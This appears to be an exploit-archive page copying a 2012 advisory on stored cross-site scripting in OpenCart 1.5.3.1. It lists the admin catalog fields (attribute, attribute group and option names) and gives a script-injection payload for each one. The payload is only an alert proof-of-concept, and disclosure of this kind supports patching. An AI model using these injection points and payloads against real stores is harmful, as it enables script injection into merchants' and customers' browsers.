Advertisement




Edit Report

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2012060285

Below is a copy:

  _  _ _ _____      _____     ____   _   _    ____   _   _  _ _____
 | |/ | |___ / _ __|___  |   / __ \ | | | |  / __ \ | | | |/ |___  |
/ __) | | |_ \| '_ \  / /   / / _` / __) __)/ / _` / __) __) |  / /
\__ \ | |___) | | | |/ /   | | (_| \__ \__ \ | (_| \__ \__ \ | / /
(   /_|_|____/|_| |_/_/     \ \__,_(   (   /\ \__,_(   (   /_|/_/
 |_|                         \____/ |_| |_|  \____/ |_| |_|


-------------------------------------------------------------------
-------------------------------------------------------------------


TITLE:  OpenCart CMS Multiple Stored XSS
Vendor: OpenCart CMS
Author: $1l3n7 @[email protected]$$17
Email:  [email protected]
Download Link: http://www.opencart.com/index.php?route=download/download
Versions: 1.5.3.1
Tested on: Windows 7


-------------------------------------------------------------------
-------------------------------------------------------------------
Description: OpenCart is an open source PHP-based online shopping cart
             system. A robust e-commerce solution for Internet merchants
             with the ability to create their own online business and
             participate in e-commerce at a minimal cost. OpenCart is
             designed feature rich, easy to use, search engine friendly
             and with a visually appealing interface.
-------------------------------------------------------------------
-------------------------------------------------------------------


  Multiple Persistent XSS:

  DEMO:

      1:

        Select Catalog Drop Down -> Attribute Menu -> Select Attribute

        Select Insert Button

        In Attribute Name Field

        POST DATA= "'-->><script>alert(0)</script>

        Similarly

        Select Catalog Drop Down -> Attribute Menu -> Select Attribute Groups

        Select Insert Button

        In Attribute Group Name Field

        POST DATA= "'-->><script>alert(0)</script>

      2:

        Select Catalog Drop Down -> Select Options

        Select Insert Button

        In Option Name Field
        POST DATA= "'-->><script>alert(0)</script>


 -------------------------------------------------------------

gr33t1ngs and ShOuTZ to r007k17-w and all my friends..

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.